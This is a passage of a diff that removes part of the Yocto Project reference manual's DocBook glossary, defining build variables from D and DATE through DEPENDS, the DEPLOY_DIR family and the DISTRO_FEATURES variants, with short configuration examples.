-                            <filename>-native</filename>)
-                            </para></listitem>
-                        <listitem><para>
-                            <link linkend='var-BUILDSDK_CXXFLAGS'><filename>BUILDSDK_CXXFLAGS</filename></link>
-                            when building for an SDK (i.e.
-                            <filename>nativesdk-</filename>)
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-d'><title>D</title>
-
-        <glossentry id='var-D'><glossterm>D</glossterm>
-            <info>
-                D[doc] = "The destination directory."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The destination directory.
-                    The location in the
-                    <link linkend='build-directory'>Build Directory</link>
-                    where components are installed by the
-                    <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-                    task.
-                    This location defaults to:
-                    <literallayout class='monospaced'>
-     ${WORKDIR}/image
-                    </literallayout>
-                    <note><title>Caution</title>
-                        Tasks that read from or write to this directory should
-                        run under
-                        <ulink url='&YOCTO_DOCS_OM_URL;#fakeroot-and-pseudo'>fakeroot</ulink>.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DATE'><glossterm>DATE</glossterm>
-            <info>
-                DATE[doc] = "The date the build was started using YMD format."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The date the build was started.
-                    Dates appear using the year, month, and day (YMD) format
-                    (e.g. "20150209" for February 9th, 2015).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DATETIME'><glossterm>DATETIME</glossterm>
-            <info>
-                DATETIME[doc] = "The date and time the build was started."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The date and time on which the current build started.
-                    The format is suitable for timestamps.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DEBIAN_NOAUTONAME'><glossterm>DEBIAN_NOAUTONAME</glossterm>
-            <info>
-                DEBIAN_NOAUTONAME[doc] = "Prevents a particular package from being renamed according to Debian package naming."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When the
-                    <link linkend='ref-classes-debian'><filename>debian</filename></link>
-                    class is inherited, which is the default behavior,
-                    <filename>DEBIAN_NOAUTONAME</filename> specifies a
-                    particular package should not be renamed according to
-                    Debian library package naming.
-                    You must use the package name as an override when you
-                    set this variable.
-                    Here is an example from the <filename>fontconfig</filename>
-                    recipe:
-                    <literallayout class='monospaced'>
-     DEBIAN_NOAUTONAME_fontconfig-utils = "1"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DEBIANNAME'><glossterm>DEBIANNAME</glossterm>
-            <info>
-                DEBIANNAME[doc] = "Allows you to override the library name for an individual package for Debian library package renaming."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When the
-                    <link linkend='ref-classes-debian'><filename>debian</filename></link>
-                    class is inherited, which is the default behavior,
-                    <filename>DEBIANNAME</filename> allows you to override the
-                    library name for an individual package.
-                    Overriding the library name in these cases is rare.
-                    You must use the package name as an override when you
-                    set this variable.
-                    Here is an example from the <filename>dbus</filename>
-                    recipe:
-                    <literallayout class='monospaced'>
-     DEBIANNAME_${PN} = "dbus-1"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DEBUG_BUILD'><glossterm>DEBUG_BUILD</glossterm>
-            <info>
-                DEBUG_BUILD[doc] = "Specifies to build packages with debugging information. This influences the value of the SELECTED_OPTIMIZATION variable."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies to build packages with debugging information.
-                    This influences the value of the
-                    <filename><link linkend='var-SELECTED_OPTIMIZATION'>SELECTED_OPTIMIZATION</link></filename>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DEBUG_OPTIMIZATION'><glossterm>DEBUG_OPTIMIZATION</glossterm>
-            <info>
-                DEBUG_OPTIMIZATION[doc] = "The options to pass in TARGET_CFLAGS and CFLAGS when compiling a system for debugging. This variable defaults to '-O -fno-omit-frame-pointer -g'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The options to pass in
-                    <filename><link linkend='var-TARGET_CFLAGS'>TARGET_CFLAGS</link></filename>
-                    and <filename><link linkend='var-CFLAGS'>CFLAGS</link></filename> when compiling
-                    a system for debugging.
-                    This variable defaults to "-O -fno-omit-frame-pointer ${DEBUG_FLAGS} -pipe".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DEFAULT_PREFERENCE'><glossterm>DEFAULT_PREFERENCE</glossterm>
-            <info>
-                DEFAULT_PREFERENCE[doc] = "Specifies a weak bias for recipe selection priority."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a weak bias for recipe selection priority.
-                </para>
-
-                <para>
-                    The most common usage of this is variable is to set
-                    it to "-1" within a recipe for a development version of a
-                    piece of software.
-                    Using the variable in this way causes the stable version
-                    of the recipe to build by default in the absence of
-                    <filename><link linkend='var-PREFERRED_VERSION'>PREFERRED_VERSION</link></filename>
-                    being used to build the development version.
-                </para>
-
-                <note>
-                    The bias provided by <filename>DEFAULT_PREFERENCE</filename>
-                    is weak and is overridden by
-                    <filename><link linkend='var-BBFILE_PRIORITY'>BBFILE_PRIORITY</link></filename>
-                    if that variable is different between two layers
-                    that contain different versions of the same recipe.
-                </note>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DEFAULTTUNE'><glossterm>DEFAULTTUNE</glossterm>
-            <info>
-                DEFAULTTUNE[doc] = "The default CPU and Application Binary Interface (ABI) tunings (i.e.  the "tune") used by the OpenEmbedded build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The default CPU and Application Binary Interface (ABI)
-                    tunings (i.e.  the "tune") used by the OpenEmbedded build
-                    system.
-                    The <filename>DEFAULTTUNE</filename> helps define
-                    <link linkend='var-TUNE_FEATURES'><filename>TUNE_FEATURES</filename></link>.
-                </para>
-
-                <para>
-                    The default tune is either implicitly or explicitly set
-                    by the machine
-                    (<link linkend='var-MACHINE'><filename>MACHINE</filename></link>).
-                    However, you can override the setting using available tunes
-                    as defined with
-                    <link linkend='var-AVAILTUNES'><filename>AVAILTUNES</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DEPENDS'><glossterm>DEPENDS</glossterm>
-            <info>
-                DEPENDS[doc] = "Lists a recipe's build-time dependencies (i.e. other recipe files)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists a recipe's build-time dependencies.
-                    These are dependencies on other recipes whose
-                    contents (e.g. headers and shared libraries) are needed
-                    by the recipe at build time.
-                </para>
-
-                <para>
-                    As an example, consider a recipe <filename>foo</filename>
-                    that contains the following assignment:
-                    <literallayout class='monospaced'>
-     DEPENDS = "bar"
-                    </literallayout>
-                    The practical effect of the previous assignment is that
-                    all files installed by bar will be available in the
-                    appropriate staging sysroot, given by the
-                    <link linkend='var-STAGING_DIR'><filename>STAGING_DIR*</filename></link>
-                    variables, by the time the
-                    <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
-                    task for <filename>foo</filename> runs.
-                    This mechanism is implemented by having
-                    <filename>do_configure</filename> depend on the
-                    <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
-                    task of each recipe listed in <filename>DEPENDS</filename>,
-                    through a
-                    <filename>[</filename><ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'><filename>deptask</filename></ulink><filename>]</filename>
-                    declaration in the
-                    <link linkend='ref-classes-base'><filename>base</filename></link>
-                    class.
-                    <note>
-                        It seldom is necessary to reference, for example,
-                        <filename>STAGING_DIR_HOST</filename> explicitly.
-                        The standard classes and build-related variables are
-                        configured to automatically use the appropriate staging
-                        sysroots.
-                    </note>
-                    As another example, <filename>DEPENDS</filename> can also
-                    be used to add utilities that run on the build machine
-                    during the build.
-                    For example, a recipe that makes use of a code generator
-                    built by the recipe <filename>codegen</filename> might have
-                    the following:
-                    <literallayout class='monospaced'>
-     DEPENDS = "codegen-native"
-                    </literallayout>
-                    For more information, see the
-                    <link linkend='ref-classes-native'><filename>native</filename></link>
-                    class and the
-                    <link linkend='var-EXTRANATIVEPATH'><filename>EXTRANATIVEPATH</filename></link>
-                    variable.
-                    <note>
-                        <title>Notes</title>
-                        <itemizedlist>
-                            <listitem><para>
-                                <filename>DEPENDS</filename> is a list of
-                                recipe names.
-                                Or, to be more precise, it is a list of
-                                <link linkend='var-PROVIDES'><filename>PROVIDES</filename></link>
-                                names, which usually match recipe names.
-                                Putting a package name such as "foo-dev" in
-                                <filename>DEPENDS</filename> does not make
-                                sense.
-                                Use "foo" instead, as this will put files
-                                from all the packages that make up
-                                <filename>foo</filename>, which includes
-                                those from <filename>foo-dev</filename>, into
-                                the sysroot.
-                                </para></listitem>
-                            <listitem><para>
-                                One recipe having another recipe in
-                                <filename>DEPENDS</filename> does not by itself
-                                add any runtime dependencies between the
-                                packages produced by the two recipes.
-                                However, as explained in the
-                                "<ulink url='&YOCTO_DOCS_OM_URL;#automatically-added-runtime-dependencies'>Automatically Added Runtime Dependencies</ulink>"
-                                section in the Yocto Project Overview and
-                                Concepts Manual, runtime dependencies will
-                                often be added automatically, meaning
-                                <filename>DEPENDS</filename> alone is
-                                sufficient for most recipes.
-                                </para></listitem>
-                            <listitem><para>
-                                Counterintuitively,
-                                <filename>DEPENDS</filename> is often necessary
-                                even for recipes that install precompiled
-                                components.
-                                For example, if <filename>libfoo</filename>
-                                is a precompiled library that links against
-                                <filename>libbar</filename>, then
-                                linking against <filename>libfoo</filename>
-                                requires both <filename>libfoo</filename>
-                                and <filename>libbar</filename> to be available
-                                in the sysroot.
-                                Without a <filename>DEPENDS</filename> from the
-                                recipe that installs <filename>libfoo</filename>
-                                to the recipe that installs
-                                <filename>libbar</filename>, other recipes might
-                                fail to link against
-                                <filename>libfoo</filename>.
-                                </para></listitem>
-                        </itemizedlist>
-                    </note>
-                </para>
-
-                <para>
-                    For information on runtime dependencies, see the
-                    <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
-                    variable.
-                    You can also see the
-                    "<ulink url='&YOCTO_DOCS_BB_URL;#tasks'>Tasks</ulink>" and
-                    "<ulink url='&YOCTO_DOCS_BB_URL;#dependencies'>Dependencies</ulink>"
-                    sections in the BitBake User Manual for additional
-                    information on tasks and dependencies.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DEPLOY_DIR'><glossterm>DEPLOY_DIR</glossterm>
-            <info>
-                DEPLOY_DIR[doc] = "Points to the general area that the OpenEmbedded build system uses to place images, packages, SDKs, and other output files that are ready to be used outside of the build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the general area that the OpenEmbedded build
-                    system uses to place images, packages, SDKs, and other output
-                    files that are ready to be used outside of the build system.
-                    By default, this directory resides within the
-                    <link linkend='build-directory'>Build Directory</link>
-                    as <filename>${TMPDIR}/deploy</filename>.
-                </para>
-
-                <para>
-                    For more information on the structure of the Build
-                    Directory, see
-                    "<link linkend='structure-build'>The Build Directory - <filename>build/</filename></link>"
-                    section.
-                    For more detail on the contents of the
-                    <filename>deploy</filename> directory, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#images-dev-environment'>Images</ulink>",
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>",
-                    and
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#sdk-dev-environment'>Application Development SDK</ulink>"
-                    sections all in the Yocto Project Overview and Concepts
-                    Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DEPLOY_DIR_DEB'><glossterm>DEPLOY_DIR_DEB</glossterm>
-            <info>
-                DEPLOY_DIR_DEB[doc] = "Points to a Debian-specific area that the OpenEmbedded build system uses to place images, packages, SDKs, and other output files that are ready to be used outside of the build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the area that the OpenEmbedded build system uses
-                    to place Debian packages that are ready to be used outside
-                    of the build system.
-                    This variable applies only when
-                    <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
-                    contains "package_deb".
-                </para>
-
-                <para>
-                    The BitBake configuration file initially defines the
-                    <filename>DEPLOY_DIR_DEB</filename> variable as a
-                    sub-folder of
-                    <link linkend='var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></link>:
-                    <literallayout class='monospaced'>
-     DEPLOY_DIR_DEB = "${DEPLOY_DIR}/deb"
-                    </literallayout>
-                </para>
-
-                <para>
-                    The
-                    <link linkend='ref-classes-package_deb'><filename>package_deb</filename></link>
-                    class uses the
-                    <filename>DEPLOY_DIR_DEB</filename> variable to make sure
-                    the
-                    <link linkend='ref-tasks-package_write_deb'><filename>do_package_write_deb</filename></link>
-                    task writes Debian packages into the appropriate folder.
-                    For more information on how packaging works, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DEPLOY_DIR_IMAGE'><glossterm>DEPLOY_DIR_IMAGE</glossterm>
-            <info>
-                DEPLOY_DIR_IMAGE[doc] = "Points to the area that the OpenEmbedded build system uses to place images and other associated output files that are ready to be deployed onto the target machine."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the area that the OpenEmbedded build system uses
-                    to place images and other associated output files that are
-                    ready to be deployed onto the target machine.
-                    The directory is machine-specific as it contains the
-                    <filename>${MACHINE}</filename> name.
-                    By default, this directory resides within the
-                    <link linkend='build-directory'>Build Directory</link>
-                    as <filename>${DEPLOY_DIR}/images/${MACHINE}/</filename>.
-                </para>
-
-                <para>
-                    For more information on the structure of the Build
-                    Directory, see
-                    "<link linkend='structure-build'>The Build Directory - <filename>build/</filename></link>"
-                    section.
-                    For more detail on the contents of the
-                    <filename>deploy</filename> directory, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#images-dev-environment'>Images</ulink>"
-                    and
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#sdk-dev-environment'>Application Development SDK</ulink>"
-                    sections both in the Yocto Project Overview and Concepts
-                    Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DEPLOY_DIR_IPK'><glossterm>DEPLOY_DIR_IPK</glossterm>
-            <info>
-                DEPLOY_DIR_IPK[doc] = "Points to a IPK-specific area that the OpenEmbedded build system uses to place images, packages, SDKs, and other output files that are ready to be used outside of the build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the area that the OpenEmbedded build system uses
-                    to place IPK packages that are ready to be used outside of
-                    the build system.
-                    This variable applies only when
-                    <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
-                    contains "package_ipk".
-                </para>
-
-                <para>
-                    The BitBake configuration file initially defines this
-                    variable as a sub-folder of
-                    <link linkend='var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></link>:
-                    <literallayout class='monospaced'>
-     DEPLOY_DIR_IPK = "${DEPLOY_DIR}/ipk"
-                    </literallayout>
-                </para>
-
-                <para>
-                    The
-                    <link linkend='ref-classes-package_ipk'><filename>package_ipk</filename></link>
-                    class uses the
-                    <filename>DEPLOY_DIR_IPK</filename> variable to make sure
-                    the
-                    <link linkend='ref-tasks-package_write_ipk'><filename>do_package_write_ipk</filename></link>
-                    task writes IPK packages into the appropriate folder.
-                    For more information on how packaging works, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DEPLOY_DIR_RPM'><glossterm>DEPLOY_DIR_RPM</glossterm>
-            <info>
-                DEPLOY_DIR_RPM[doc] = "Points to a RPM-specific area that the OpenEmbedded build system uses to place images, packages, SDKs, and other output files that are ready to be used outside of the build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the area that the OpenEmbedded build system uses
-                    to place RPM packages that are ready to be used outside
-                    of the build system.
-                    This variable applies only when
-                    <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
-                    contains "package_rpm".
-                </para>
-
-                <para>
-                    The BitBake configuration file initially defines this
-                    variable as a sub-folder of
-                    <link linkend='var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></link>:
-                    <literallayout class='monospaced'>
-     DEPLOY_DIR_RPM = "${DEPLOY_DIR}/rpm"
-                    </literallayout>
-                </para>
-
-                <para>
-                    The
-                    <link linkend='ref-classes-package_rpm'><filename>package_rpm</filename></link>
-                    class uses the
-                    <filename>DEPLOY_DIR_RPM</filename> variable to make sure
-                    the
-                    <link linkend='ref-tasks-package_write_rpm'><filename>do_package_write_rpm</filename></link>
-                    task writes RPM packages into the appropriate folder.
-                    For more information on how packaging works, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DEPLOY_DIR_TAR'><glossterm>DEPLOY_DIR_TAR</glossterm>
-            <info>
-                DEPLOY_DIR_TAR[doc] = "Points to a tarball area that the OpenEmbedded build system uses to place images, packages, SDKs, and other output files that are ready to be used outside of the build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the area that the OpenEmbedded build system uses
-                    to place tarballs that are ready to be used outside of
-                    the build system.
-                    This variable applies only when
-                    <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
-                    contains "package_tar".
-                </para>
-
-                <para>
-                    The BitBake configuration file initially defines this
-                    variable as a sub-folder of
-                    <link linkend='var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></link>:
-                    <literallayout class='monospaced'>
-     DEPLOY_DIR_TAR = "${DEPLOY_DIR}/tar"
-                    </literallayout>
-                </para>
-
-                <para>
-                    The
-                    <link linkend='ref-classes-package_tar'><filename>package_tar</filename></link>
-                    class uses the
-                    <filename>DEPLOY_DIR_TAR</filename> variable to make sure
-                    the
-                    <link linkend='ref-tasks-package_write_tar'><filename>do_package_write_tar</filename></link>
-                    task writes TAR packages into the appropriate folder.
-                    For more information on how packaging works, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DEPLOYDIR'><glossterm>DEPLOYDIR</glossterm>
-            <info>
-                DEPLOYDIR[doc] = "For recipes that inherit the deploy class, the DEPLOYDIR points to a temporary work area for deployed files."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-deploy'><filename>deploy</filename></link>
-                    class, the <filename>DEPLOYDIR</filename> points to a
-                    temporary work area for deployed files that is set in the
-                    <filename>deploy</filename> class as follows:
-                    <literallayout class='monospaced'>
-     DEPLOYDIR = "${WORKDIR}/deploy-${<link linkend='var-PN'><filename>PN</filename></link>}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    Recipes inheriting the <filename>deploy</filename> class
-                    should copy files to be deployed into
-                    <filename>DEPLOYDIR</filename>, and the class will take
-                    care of copying them into
-                    <link linkend='var-DEPLOY_DIR_IMAGE'><filename>DEPLOY_DIR_IMAGE</filename></link>
-                    afterwards.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DESCRIPTION'><glossterm>DESCRIPTION</glossterm>
-            <info>
-                DESCRIPTION[doc] = "The package description used by package managers. If not set, DESCRIPTION takes the value of the SUMMARY variable."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The package description used by package managers.
-                    If not set, <filename>DESCRIPTION</filename> takes
-                    the value of the
-                    <link linkend='var-SUMMARY'><filename>SUMMARY</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DISTRO'><glossterm>DISTRO</glossterm>
-            <info>
-                DISTRO[doc] = "The short name of the distribution. If the variable is blank, meta/conf/distro/defaultsetup.conf will be used."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The short name of the distribution.
-                    For information on the long name of the distribution, see
-                    the
-                    <link linkend='var-DISTRO_NAME'><filename>DISTRO_NAME</filename></link>
-                    variable.
-                </para>
-
-                <para>
-                    The <filename>DISTRO</filename> variable corresponds to a
-                    distribution configuration file whose root name is the
-                    same as the variable's argument and whose filename
-                    extension is <filename>.conf</filename>.
-                    For example, the distribution configuration file for the
-                    Poky distribution is named <filename>poky.conf</filename>
-                    and resides in the
-                    <filename>meta-poky/conf/distro</filename> directory of
-                    the
-                    <link linkend='source-directory'>Source Directory</link>.
-                </para>
-
-                <para>
-                    Within that <filename>poky.conf</filename> file, the
-                    <filename>DISTRO</filename> variable is set as follows:
-                    <literallayout class='monospaced'>
-     DISTRO = "poky"
-                    </literallayout>
-                </para>
-
-                <para>
-                    Distribution configuration files are located in a
-                    <filename>conf/distro</filename> directory within the
-                    <link linkend='metadata'>Metadata</link>
-                    that contains the distribution configuration.
-                    The value for <filename>DISTRO</filename> must not contain
-                    spaces, and is typically all lower-case.
-                    <note>
-                        If the <filename>DISTRO</filename> variable is blank,
-                        a set of default configurations are used, which are
-                        specified within
-                        <filename>meta/conf/distro/defaultsetup.conf</filename>
-                        also in the Source Directory.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DISTRO_CODENAME'><glossterm>DISTRO_CODENAME</glossterm>
-            <info>
-                DISTRO_CODENAME[doc] = "Specifies a codename for the distribution being built."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a codename for the distribution being built.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DISTRO_EXTRA_RDEPENDS'><glossterm>DISTRO_EXTRA_RDEPENDS</glossterm>
-            <info>
-                DISTRO_EXTRA_RDEPENDS[doc] = "Specifies a list of distro-specific packages to add to all images. The variable only applies to the images that include packagegroup-base."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of distro-specific packages to add to all images.
-                    This variable takes affect through
-                    <filename>packagegroup-base</filename> so the
-                    variable only really applies to the more full-featured
-                    images that include <filename>packagegroup-base</filename>.
-                    You can use this variable to keep distro policy out of
-                    generic images.
-                    As with all other distro variables, you set this variable
-                    in the distro <filename>.conf</filename> file.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DISTRO_EXTRA_RRECOMMENDS'><glossterm>DISTRO_EXTRA_RRECOMMENDS</glossterm>
-            <info>
-                DISTRO_EXTRA_RRECOMMENDS[doc] = "Specifies a list of distro-specific packages to add to all images if the packages exist. The list of packages are automatically installed but you can remove them."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of distro-specific packages to add to all images
-                    if the packages exist.
-                    The packages might not exist or be empty (e.g. kernel modules).
-                    The list of packages are automatically installed but you can
-                    remove them.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DISTRO_FEATURES'><glossterm>DISTRO_FEATURES</glossterm>
-            <info>
-                DISTRO_FEATURES[doc] = "The features enabled for the distribution."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The software support you want in your distribution for
-                    various features.
-                    You define your distribution features in the distribution
-                    configuration file.
-                </para>
-
-                <para>
-                    In most cases, the presence or absence of a feature in
-                    <filename>DISTRO_FEATURES</filename> is translated to the
-                    appropriate option supplied to the configure script
-                    during the
-                    <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
-                    task for recipes that optionally support the feature.
-                    For example, specifying "x11" in
-                    <filename>DISTRO_FEATURES</filename>, causes
-                    every piece of software built for the target that can
-                    optionally support X11 to have its X11 support enabled.
-                </para>
-
-                <para>
-                    Two more examples are Bluetooth and NFS support.
-                    For a more complete list of features that ships with the
-                    Yocto Project and that you can provide with this variable,
-                    see the
-                    "<link linkend='ref-features-distro'>Distro Features</link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DISTRO_FEATURES_BACKFILL'><glossterm>DISTRO_FEATURES_BACKFILL</glossterm>
-            <info>
-                DISTRO_FEATURES_BACKFILL[doc] = "Features to be added to DISTRO_FEATURES if not also present in DISTRO_FEATURES_BACKFILL_CONSIDERED. This variable is set in the meta/conf/bitbake.conf file and it is not intended to be user-configurable."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Features to be added to
-                    <filename><link linkend='var-DISTRO_FEATURES'>DISTRO_FEATURES</link></filename>
-                    if not also present in
-                    <filename><link linkend='var-DISTRO_FEATURES_BACKFILL_CONSIDERED'>DISTRO_FEATURES_BACKFILL_CONSIDERED</link></filename>.
-                </para>
-
-                <para>
-                    This variable is set in the <filename>meta/conf/bitbake.conf</filename> file.
-                    It is not intended to be user-configurable.
-                    It is best to just reference the variable to see which distro features are
-                    being backfilled for all distro configurations.
-                    See the "<link linkend='ref-features-backfill'>Feature Backfilling</link>" section for
-                    more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DISTRO_FEATURES_BACKFILL_CONSIDERED'><glossterm>DISTRO_FEATURES_BACKFILL_CONSIDERED</glossterm>
-            <info>
-                DISTRO_FEATURES_BACKFILL_CONSIDERED[doc] = "Features from DISTRO_FEATURES_BACKFILL that should not be backfilled (i.e. added to DISTRO_FEATURES) during the build."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Features from
-                    <filename><link linkend='var-DISTRO_FEATURES_BACKFILL'>DISTRO_FEATURES_BACKFILL</link></filename>
-                    that should not be backfilled (i.e. added to
-                    <filename><link linkend='var-DISTRO_FEATURES'>DISTRO_FEATURES</link></filename>)
-                    during the build.
-                    See the "<link linkend='ref-features-backfill'>Feature Backfilling</link>" section for
-                    more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DISTRO_FEATURES_DEFAULT'><glossterm>DISTRO_FEATURES_DEFAULT</glossterm>
-            <info>
-                DISTRO_FEATURES_DEFAULT[doc] = "Provides the default list of distro features with the exception of any libc-specific features."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A convenience variable that gives you the default
-                    list of distro features with the exception of any
-                    features specific to the C library
-                    (<filename>libc</filename>).
-                </para>
-
-                <para>
-                    When creating a custom distribution, you might find it
-                    useful to be able to reuse the default
-                    <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
-                    options without the need to write out the full set.
-                    Here is an example that uses
-                    <filename>DISTRO_FEATURES_DEFAULT</filename> from a
-                    custom distro configuration file:
-                    <literallayout class='monospaced'>
-     DISTRO_FEATURES ?= "${DISTRO_FEATURES_DEFAULT} myfeature"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DISTRO_FEATURES_FILTER_NATIVE'><glossterm>DISTRO_FEATURES_FILTER_NATIVE</glossterm>
-            <info>
-                DISTRO_FEATURES_FILTER_NATIVE[doc] = "Specifies a list of features that if present in the target DISTRO_FEATURES value should be included in DISTRO_FEATURES when building native recipes."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of features that if present in
-                    the target
-                    <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
-                    value should be included in
-                    <filename>DISTRO_FEATURES</filename> when building native
-                    recipes.
-                    This variable is used in addition to the features
-                    filtered using the
-                    <link linkend='var-DISTRO_FEATURES_NATIVE'><filename>DISTRO_FEATURES_NATIVE</filename></link>
-                    variable.
-               </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DISTRO_FEATURES_FILTER_NATIVESDK'><glossterm>DISTRO_FEATURES_FILTER_NATIVESDK</glossterm>
-            <info>
-                DISTRO_FEATURES_FILTER_NATIVESDK[doc] = "Specifies a list of features that if present in the target DISTRO_FEATURES value should be included in DISTRO_FEATURES when building nativesdk recipes."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of features that if present in the target
-                    <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
-                    value should be included in
-                    <filename>DISTRO_FEATURES</filename> when building
-                    nativesdk recipes.
-                    This variable is used in addition to the features
-                    filtered using the
-                    <link linkend='var-DISTRO_FEATURES_NATIVESDK'><filename>DISTRO_FEATURES_NATIVESDK</filename></link>
-                    variable.
-               </para>
-            </glossdef>
-        </glossentry>
-
-<!--
-        <glossentry id='var-DISTRO_FEATURES_LIBC'><glossterm>DISTRO_FEATURES_LIBC</glossterm>
-            <info>
-                DISTRO_FEATURES_LIBC[doc] = "Specifies the list of distro features that are specific to the C library (libc)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A convenience variable that specifies the list of distro
-                    features that are specific to the C library
-                    (<filename>libc</filename>).
-                    Typically, these features are prefixed with "libc-" and
-                    control which features are enabled at during the build
-                    within the C library itself.
-                </para>
-            </glossdef>
-        </glossentry>
--->
-
-        <glossentry id='var-DISTRO_FEATURES_NATIVE'><glossterm>DISTRO_FEATURES_NATIVE</glossterm>
-            <info>
-                DISTRO_FEATURES_NATIVE[doc] = "Specifies a list of features that should be included in DISTRO_FEATURES when building native recipes."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of features that should be included in
-                    <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
-                    when building native recipes.
-                    This variable is used in addition to the features
